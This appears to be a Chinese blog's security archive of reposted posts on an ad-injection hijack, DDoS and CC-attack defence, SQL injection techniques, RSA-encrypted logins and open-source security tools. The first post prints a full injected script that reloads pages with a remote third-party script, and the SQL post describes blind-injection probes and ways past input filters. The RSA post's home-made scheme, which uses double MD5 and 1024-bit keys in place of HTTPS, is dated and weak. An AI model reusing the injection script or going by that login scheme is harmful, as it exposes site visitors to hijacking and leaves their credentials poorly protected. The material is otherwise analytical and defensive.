Category Archives: Security

到底是谁在挂广告？

今天发现公司网站和客户的网站偶尔会出现白页，单击右键却看到一段代码： <html><head></head><body><script>!function(){function a(){var a=new Date;a.setTime(a.getTime()+6e4),document.cookie="sessioned=1;expires="+a.toUTCString()}function b(b){a(),setTimeout(function(){location.href=location.href},b)}var d,e,f,c=1e4;try{if(!/sessioned=1/.test(document.cookie)){a(),e=document.createElement("script"),f=!1,e.src="//matchdp.sankuai.cn.shuyang5.com/fw0709/gg.js?1",d=new XMLHttpRequest,d.open("GET",window.location,!0),d.setRequestHeader("X-Requested-With","XMLHttpRequest");try{d.timeout=c}catch(g){}d.send(),d.onreadystatechange=function(){try{if(4==d.readyState){if(200!=d.status||"text/html"!=d.getResponseHeader("Content-Type"))throw"";text=d.responseText.replace(/<\/body>/i,e.outerHTML+"</body>"),document.open("text/html","replace"),document.write(text),setTimeout(function(){document.close()},1e3),f=!0}}catch(a){b(100)}}}}catch(g){b(150)}finally{setTimeout(function(){f||b(1)},c+1e3)}}();</script></body></html> 目测广告的机率比较大，决定找一下源头： 1.shuyang5.com的所有者是：jinmi.com 2.jinmi.com的所有者安徽合肥的个人 3.通过时一步分析发现了另一个页面：http://matchdp.sankuai.cn.shuyang5.com/tj/mltj2.html；并且上面有站长统计，点击后显示此站点叫“简单点”，估计站长站是知道这是谁的站点的。 4.以上页面的服务器用的都是阿里云(139.129.99.6)的，我N个阿里云的服务器均出现这个现象。看来阿里云技术的嫌疑大些。 5.通过IP反查又找到了另外的站点：http://cpro.jian123.com/lm6.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="keywords" content="联盟"> <meta name="description" content="联盟"> </head> <body> <div id="main"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!— 300*250新 —> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-7963971038590542" data-ad-slot="8049044918"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </body> </html> 通过对其代码的分析，是挂广告赚钱无疑。 无耐水平有限，只找到这些线索。有兴趣的朋友，欢迎交流~

攻击者开始利用 ImageMagick 漏洞攻击网站

安全研究人员称，攻击者没有浪费一点时间，开始利用刚刚曝出的ImageMagick高危漏洞去执行恶意代码以控制网站的Web服务器。ImageMagick是一个广泛使用的图像处理库，它的一个高危漏洞允许远程代码执行，攻击者上传植入恶意代码的图像，Web服务器在处理时能被利用执行攻击者选择的代码。开发者尚未释出修正漏洞的补丁。CloudFlare的研究员 John Graham-Cumming在官方博客上称，攻击者正在利用该漏洞攻击网站。   from:http://www.oschina.net/news/73296/inside-imagetragick-the-real-payloads-used-to-hack-websites

防范 DDoS 攻击的 15 个方法

为了对抗 DDoS(分布式拒绝服务)攻击，你需要对攻击时发生了什么有一个清楚的理解. 简单来讲，DDoS 攻击可以通过利用服务器上的漏洞，或者消耗服务器上的资源(例如 内存、硬盘等等)来达到目的。DDoS 攻击主要要两大类: 带宽耗尽攻击和资源耗尽攻击. 为了有效遏制这两种类型的攻击，你可以按照下面列出的步骤来做： 1. 如果只有几台计算机是攻击的来源，并且你已经确定了这些来源的 IP 地址, 你就在防火墙服务器上放置一份 ACL（访问控制列表) 来阻断这些来自这些 IP 的访问。如果可能的话 将 web 服务器的 IP 地址变更一段时间，但是如果攻击者通过查询你的 DNS 服务器解析到你新设定的 IP，那这一措施及不再有效了。 2. 如果你确定攻击来自一个特定的国家，可以考虑将来自那个国家的 IP 阻断，至少要阻断一段时间. 3、监控进入的网络流量。通过这种方式可以知道谁在访问你的网络，可以监控到异常的访问者，可以在事后分析日志和来源IP。在进行大规模的攻击之前，攻击者可能会使用少量的攻击来测试你网络的健壮性。 4、对付带宽消耗型的攻击来说，最有效（也很昂贵）的解决方案是购买更多的带宽。 5、也可以使用高性能的负载均衡软件，使用多台服务器，并部署在不同的数据中心。 6、对web和其他资源使用负载均衡的同时，也使用相同的策略来保护DNS。 7、优化资源使用提高 web server 的负载能力。例如，使用 apache 可以安装 apachebooster 插件，该插件与 varnish 和 nginx 集成，可以应对突增的流量和内存占用。 8、使用高可扩展性的 DNS 设备来保护针对 DNS 的 DDOS 攻击。可以考虑购买 Cloudfair 的商业解决方案，它可以提供针对 DNS 或 TCP/IP3 到7层的 DDOS 攻击保护。 9、启用路由器或防火墙的反IP欺骗功能。在 CISCO 的 ASA 防火墙中配置该功能要比在路由器中更方便。在 ASDM（Cisco Adaptive Security Device Manager）中启用该功能只要点击“配置”中的“防火墙”，找到“anti-spoofing”然后点击启用即可。也可以在路由器中使用 ACL（access control list）来防止 IP 欺骗，先针对内网创建 ACL，然后应用到互联网的接口上。 10、使用第三方的服务来保护你的网站。有不少公司有这样的服务，提供高性能的基础网络设施帮你抵御拒绝服务攻击。你只需要按月支付几百美元费用就行。 11、注意服务器的安全配置，避免资源耗尽型的 DDOS 攻击。 12、听从专家的意见，针对攻击事先做好应对的应急方案。 13、监控网络和 web 的流量。如果有可能可以配置多个分析工具，例如：Statcounter 和 Google analytics，这样可以更直观了解到流量变化的模式，从中获取更多的信息。 14、保护好 […]

用RSA加密实现Web登录密码加密传输

通常我们做一个Web应用程序的时候都需要登录，登录就要输入用户名和登录密码，并且，用户名和登录密码都是明文传输的，这样就有可能在中途被别人拦截，尤其是在网吧等场合。 这里顺带一个小插曲，我以前有家公司，办公室装修时候安排的网口相对较少，不太够用，于是我和另外一个同事使用了一个hub来共享一个网口，这就导致了很有趣的现象：任何他的网络包我都能抓得到，当然了，我的他也能抓得到。这是不是有很大的安全隐患了？我有可能在不经意间会泄漏自己的密码。 所以，很多安全要求较高的网站都不会明文传输密码，它们会使用https来确保传输过程的安全，https是用证书来实现的，证书来自于证书颁发机构，当然了，你也可以自己造一张证书，但这样别人访问你的网站的时候还是会遇到麻烦，因为你自己造的证书不在用户浏览器的信任范围之内，你还得在用户浏览器上安装你的证书，来让用户浏览器相信你的网站，很多用户并不知道如何操作，就算会操作，也能也不乐意干；另一种选择是你向权威证书颁发机构申请一张证书，但这样有一定的门槛，还需要付费，也不是我们乐意干的事。 所以，我打算自己实现一个密码加密传输方法。 这里使用了RSA非对称加密算法，对称加密也许大家都已经很熟悉，也就是加密和解密用的都是同样的密钥，没有密钥，就无法解密，这是对称加密。而非对称加密算法中，加密所用的密钥和解密所用的密钥是不相同的：你使用我的公钥加密，我使用我的私钥来解密；如果你不使用我的公钥加密，那我无法解密；如果我没有私钥，我也没法解密。 我设计的这个登录密码加密传输方法的原理图如下：   首先，先演练一下非对称加密：

大家可以清楚看到，密码被加密成128字节长度的密文，为什么是固定128字节呢？这是因为我们的RSACryptoServiceProvider默认生成的key的长度是1024，即1024位的加密，所以不管你要加密的密码有多长，它生成的密文的长度肯定是128字节，也因为这样，密码的长度是有限制的，1024位的RSA算法，只能加密大约100个字节长度的明文，要提高可加密的明文的长度限制，就得增加key的长度，比如把key改到2048位，这样能加密的明文的长度限制也就变为大概200出头这样……还是太少啊！而且这样会带来加密速度的显著下降，RSA本来就很慢……是的，比同没有长度限制的对称加密，这种非对称加密的限制可真多，即便是200个字符，又能传输什么东西呢？——密码！这个就够了，传输完密码之后，我们就使用对称加密，所以，RSA往往是用来“协商”一个对称加密的key的。 接下去，真正的难点在于用javascript实现一个和.net的RSA兼容的算法。密码学，对我来说真像天书一般，每次我一看就头大，这个工作是没办法自己做的了，只能到网上找，那是相当的费力啊，找到许多js的RSA实现，但都和.net的这套东西不兼容，最后还是功夫不负有心人，终于找到了一套。不多说，上代码：

这是客户端代码，大家可以看到，基本没有什么服务器端代码，<%=postbackUserName%>用于回显输入的用户名，<%=LoginResult%>用于显示登录结果，<%=strPublicKeyExponent%>和<%=strPublicKeyModulus%>则用来告诉客户端RSA公钥。需要的javascript文件说明： jQuery.md5.js –  用于对密码进行两次md5加密；（我通常在数据库中保存的用户密码是两次MD5后的结果） BigInt.js – 用于生成一个大整型；（这是RSA算法的需要） RSA.js – RSA的主要算法； Barrett.js – RSA算法所需要用到的一个支持文件； 对于密码学，我几乎一无所知，所以没办法跟大家解释清楚RSA算法的原理，抱歉，我只知道怎么用。关于javascript中这行代码：“setMaxDigits(129);”具体表示什么我也不清楚，我只知道，把参数改为小于129的数之后会导致客户端的javascript执行进入死循环。服务器端代码也很简单：

用户名“user1” 密码“123456” 登录成功！ 抓取http报文看看POST的“密码”： 这样的“密码”的破解就成为了理论上的可行了。:) 下面提供完整代码下载（使用VS2010开发环境）：RSALoginTest 我根据博主的例子整理的：RsaDemo   from:http://www.cnblogs.com/AloneSword/archive/2013/09/18/3329359.html

sql注入

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击。 原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。 根据相关技术原理，SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致；后者主要是由于程序员对输入未进行细致地过滤，从而执行了非法的数据查询。基于此，SQL注入的产生原因通常表现在以下几方面：①不当的类型处理；②不安全的数据库配置；③不合理的查询集处理；④不当的错误处理；⑤转义字符处理不合适；⑥多个提交处理不当。 防护归纳一下，主要有以下几点： 1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和 双"-"进行转换等。 2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。 3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。 4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。 5.应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装。 SQL注入技术 强制产生错误 对数据库类型、版本等信息进行识别是此类型攻击的动机所在。它的目的是收集数据库的类型、结构等信息为其他类型的攻击做准备，可谓是攻击的一个预备步骤。利用应用程序服务器返回的默认错误信息而取得漏洞信息。采用非主流通道技术 除HTTP响应外，能通过通道获取数据，然而，通道大都依赖与数据库支持的功能而存在，所以这项技术不完全适用于所有的数据库平台。SQL注入的非主流通道主要有E-mail、DNS以及数据库连接，基本思想为：先对SQL查询打包，然后借助非主流通道将信息反馈至攻击者。 使用特殊的字符 不同的SQL数据库有许多不同是特殊字符和变量，通过某些配置不安全或过滤不细致的应用系统能够取得某些有用的信息，从而对进一步攻击提供方向。 使用条件语句 此方式具体可分为基于内容、基于时间、基于错误三种形式。一般在经过常规访问后加上条件语句，根据信息反馈来判定被攻击的目标。 利用存储过程 通过某些标准存储过程，数据库厂商对数据库的功能进行扩展的同时，系统也可与进行交互。部分存储过程可以让用户自行定义。通过其他类型的攻击收集到数据库的类型、结构等信息后，便能够建构执行存储过程的命令。这种攻击类型往往能达到远程命令执行、特权扩张、拒绝服务的目的。 避开输入过滤技术 虽然对于通常的编码都可利用某些过滤技术进行SQL注入防范，但是鉴于此种情况下也有许多方法避开过滤，一般可达到此目的的技术手段包括SQL注释和动态查询的使用，利用截断，URL编码与空字节的使用，大小写变种的使用以及嵌套剥离后的表达式等等。借助于此些手段，输入构思后的查询可以避开输入过滤，从而攻击者能获得想要的查询结果。 推断技术 能够明确数据库模式、提取数据以及识别可注入参数。此种方式的攻击通过网站对用户输入的反馈信息，对可注入参数、数据库模式推断，这种攻击构造的查询执行后获得的答案只有真、假两种。基于推断的注入方式主要分为时间测定注入与盲注入两种。前者是在注入语句里加入语句诸如“waitfor 100”，按照此查询结果出现的时间对注入能否成功和数据值范围的推导进行判定；后者主要是“and l=l”、“and l=2”两种经典注入方法。这些方式均是对一些间接关联且能取得回应的问题进行提问，进而通过响应信息推断出想要信息，然后进行攻击。 SQL注入防范 要防御SQL注入，用户的输入就绝对不能直接被嵌入到SQL语句中。恰恰相反，用户的输入必须进行过滤，或者使用参数化的语句。参数化的语句使用参数而不是将用户输入嵌入到语句中。在多数情况中，SQL语句就得以修正。然后，用户输入就被限于一个参数。输入验证 检查用户输入的合法性，确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行之所以要执行服务器端验证，是为了弥补客户端验证机制脆弱的安全性。 在客户端，攻击者完全有可能获得网页的源代码，修改验证合法性的脚本（或者直接删除脚本），然后将非法内容通过修改后的表单提交给服务器。因此，要保证验证操作确实已经执行，唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象，例如Regular Expression Validator，它们能够自动生成验证用的客户端脚本，当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象，你可以通过Custom Validator自己创建一个。 错误消息处理 防范SQL注入，还要避免出现一些详细的错误消息，因为黑客们可以利用这些消息。要使用一种标准的输入确认机制来验证所有的输入数据的长度、类型、语句、企业规则等。 加密处理 将用户登录名称、密码等数据加密保存。加密用户输入的数据，然后再将它与数据库中保存的数据比较，这相当于对用户输入的数据进行了“消毒”处理，用户输入的数据不再对数据库有任何特殊的意义，从而也就防止了攻击者注入SQL命令。 存储过程来执行所有的查询 SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外，它还使得数据库权限可以限制到只允许特定的存储过程执行，所有的用户输入必须遵从被调用的存储过程的安全上下文，这样就很难再发生注入式攻击了。 使用专业的漏洞扫描工具 攻击者们目前正在自动搜索攻击目标并实施攻击，其技术甚至可以轻易地被应用于其它的Web架构中的漏洞。企业应当投资于一些专业的漏洞扫描工具，如大名鼎鼎的Acunetix的Web漏洞扫描程序等。一个完善的漏洞扫描程序不同于网络扫描程序，它专门查找网站上的SQL注入式漏洞。最新的漏洞扫描程序可以查找最新发现的漏洞。 确保数据库安全 锁定你的数据库的安全，只给访问数据库的web应用功能所需的最低的权限，撤销不必要的公共许可，使用强大的加密技术来保护敏感数据并维护审查跟踪。如果web应用不需要访问某些表，那么确认它没有访问这些表的权限。如果web应用只需要只读的权限，那么就禁止它对此表的 drop 、insert、update、delete 的权限，并确保数据库打了最新补丁。 安全审评 在部署应用系统前，始终要做安全审评。建立一个正式的安全过程，并且每次做更新时，要对所有的编码做审评。开发队伍在正式上线前会做很详细的安全审评，然后在几周或几个月之后他们做一些很小的更新时，他们会跳过安全审评这关， “就是一个小小的更新，我们以后再做编码审评好了”。请始终坚持做安全审评。

此程序包是当前使用的设备管理器,无法卸载！

盘点互联网巨头奉献的十大开源安全工具

Facebook等大型互联网公司推动的服务器与数据中心、大数据工具的开源化项目类似，当大型互联网公司们在超大规模基础设施运营方面面临的挑战 超出技术厂商的能力时，这些巨头就选择反客为主，成为创新技术的推动者和提供者。同样的情况也在信息安全领域中发生着。不少大型互联网公司经常会将自己开 发的顶级安全工具开源，推动整个互联网的安全发展。 本月早些时候安全牛曾介绍过Google开源的web安全测试工具Firing Range、Nogofail以及Facebook开源的Osquery等。 事实上不仅Google、Facebook，包括Netflix甚至Etsy.com这样的电商网站也都贡献过精品开源安全工具。 以下安全牛为大家汇总整理十大互联网巨头的开源安全工具，供大家收藏参考： 一、安全猴 Security Monkey “安全猴”是Netflix三年前开发的一个安全工具，能够对亚马逊云服务的配置进行监控和安全分析，组件功能包括监控各种AWS账号组件，机遇规则的开发和执行活动，在审计规则被触发时通知用户，并存储配置历史信息用作电子取证和审计目的。 二、OSquery OSquery是Facebook刚刚发布的一个安全工具，为安全专业人士提供了一个可调用底层操作系统功能的系统，例如启动进程、加载内核模块、在SQL数据库表中打开网络连接进行查询和监控等。 三、Skyline Skyline是电商网站Etsy技术团队开发的一个类似Nagios的实时异常侦测系统，主要目的是为安全团队提供一个可扩展的被动监控指标体系——可以同时跟踪成百上千的指标。 四、MIDAS MIDAS是Etsy与Facebook安全团队合作为Mac电脑开发的一个轻量级可扩展的入侵侦测系统。开发团队希望从MIDAS开始，企业开始留意OSX系统端点的常见攻击模式。 五、Secureheaders Secureheaders是Twitter送给web开发者的一份大礼，作为一款web安全开发工具，Secureheaders能够自动实施安 全相关的header规则，包括内容安全政策（CSP），防止XSS、HSTS等攻击，防止火绵羊（Firesheep）攻击以及XFO点击劫持等。 六、Google Rapid Response GRR（Google Rapid Response）是Google开发的一个时间响应框架，支持进行远程实时取证。Google将GRR以开源工具的方式与安全界分享，可以作为FireEye/Mandiant 的MIR事件响应平台的替代产品。 七、Scumblr和Sketchy Scumblr和Sketchy是Netflix今年夏天同时发布的两款web应用，可以帮助安全团队监控和记录社交媒体和网络聊天中的安全威胁和攻击。 八、Conceal Conceal是面向Android平台的一组简单的Java API，能够对SD卡等公共存储设备中的大文件进行快速加密和认证。Conceal由Facebook设计，开发者可利用Conceal开发出能适用于老版本Android的内存和处理器开销较低的加密算法。 九、Rappor RAPPOR(Randomized Aggregatable Privacy-Preserving Ordinal Response )是Google上月才发布的隐私工具，能够从终端用户软件采集众包统计数据，同时又不侵犯用户隐私。 十、Moloch Moloch由AOL的技术团队开发，是一个网络流量分析取证工具，能够大规模抓取IPv4数据包，进行索引并存储，可通过一个简单的web界面浏览、搜索和输出所有PCAP数据。 稿源：安全牛 FROM:http://www.oschina.net/news/57334/10-opensource-security-tools

查询一个ip上有多少个网站的方法

查询一个ip地址上面绑定了多少个域名，一般是不进行二级域名的查询的。 主要用途是： 1、租用主机前的查询，比如查询oversales的情况 2、针对某些感兴趣的网站进行查询，可以方便的查询出同一人的多个网站来 3、满足八卦心理 4、其它 目前可提供服务的包括： 1、myipneighbors，有认证码，无其它查询限制； 2、iwebtool，没注册的情况下，1小时可以查询5次； 3、whosonmyserver，无限制；使用的是discountedscripts的代码，也可以使用discountedscripts demos查询； 4、http://www.domaintools.com/reverse-ip/，有限制查询，可以给出数量和前三个域名； 5、ip-domain，连界面都是1是一致的，估计是用的同一程序或者是clone的； 6、webhosting info， 7、yougetsignal, 查询质量分析： 这些脚本都无法保证查询结果的完整性，即会有部分结果被遗漏。以本blog域名为例，以上查询的数字为： No. name numbers 1 myipneighbors 14 2 iwebtool 1 3 whosonmyserver 14 4 domaintools 22 5 ip-domain 14 6 webhosting 33 7 yougetsignal 14 此外，针对国内虚拟主机的查询，因国内IP数量有限，相对有效；针对国外虚拟主机，因技术、ip丰富等原因，查询的有效性相对不高，仅供参考。 from:http://www.cnblogs.com/top5/archive/2011/08/01/2124242.html

网站防止CC攻击的方法

CC攻击（Challenge Collapsar）是DDOS（分布式拒绝服务）的一种，也是一种常见的网站攻击方法，攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包，造成对方服务器资源耗尽，一直到宕机崩溃。 CC攻击的攻击技术含量低，利用工具和一些IP代理，一个初、中级的电脑水平的用户就能够实施攻击。不过，如果了解了CC攻击的原理，那就不难针对CC攻击实施一些有效的防范措施。 通常防止CC攻击的方法有几种，一个是通过防火墙，另外一些网络公司也提供了一些防火墙服务，例如XX网站卫士和XX宝，还有一种方法是自己写程序预防，昨天网站遇到CC攻击，这也让我尝试了一下各种防止CC攻击方法的有效性。 一开始我想使用某某网站卫士来预防攻击，从界面上看，似乎是防止了大量的CC攻击，但登录网站后发现，流量依旧异常，攻击还是依旧，看起来这个网站卫士的效果并没有达到。 从原理上看，基本上所有的防火墙都会检测并发的TCP/IP连接数目，超过一定数目一定频率就会被认为是Connection-Flood。但如果IP的数量足够大，使得单个IP的连接数较少，那么防火墙未必能阻止CC攻击。 不仅如此，我还发现，启用了某某网站卫士之后，反而更容易被CC攻击，因为这个网站卫士并不能过滤掉CC攻击，攻击的IP经过其加速后，更换成为这个网站卫士的IP，在网站服务器端显示的IP都是相同的，导致服务器端无法过滤这些IP。 实际上，不使用网站卫士类的服务，直接通过分析网站日志，还是很容易分辨出哪个IP是CC攻击的，因为CC攻击毕竟是通过程序来抓取网页，与普通浏览者 的特性区别还是很大的，例如普通浏览者访问一个网页，必定会连续抓取网页的HTML文件、CSS文件、JS文件和图片等一系列相关文件，而CC攻击者仅仅 只会抓取一个URL地址的文件，不会抓取其他类型的文件，其User Agent也大部分和普通浏览者不同，这就可以在服务器上很容易分辨出哪些访问者是CC攻击了，既然可以判断出攻击者的IP，那么预防措施就很简单，只需 要批量将这些IP屏蔽，即可达到防范CC攻击的目的。 最终，我花了半个小时写了一段小程序，运行之后自动屏蔽了数百个IP，网站才算正常，从而证明，防火墙对于CC攻击的防御并不有效，最有效的方法还是在服务器端通过程序自动屏蔽来预防。 看来CC攻击的门槛还真低啊，搞个几百个代理或者肉鸡就能攻击别人了，其成本非常低，但效果比较明显，如果攻击者流量巨大的话，通过耗费带宽资源的方式 都可以进行攻击。但是，CC攻击也有明显的技术缺陷，就是攻击者的IP并不是海量的，通常就是几百数千的级别，并且是真实访问了网站页面，这就使得网站可 以通过程序过滤的方式，轻松获取到这些攻击者IP，批量进行屏蔽，那么这种CC攻击就会得到预防。 对于站长来说，通过程序来过滤CC攻击门槛较高，要有一定的编程技术，因此还是建议使用第三方网站提供的预防CC的服务，目前主要的网站有：360网站卫士、百度加速乐、安全宝等。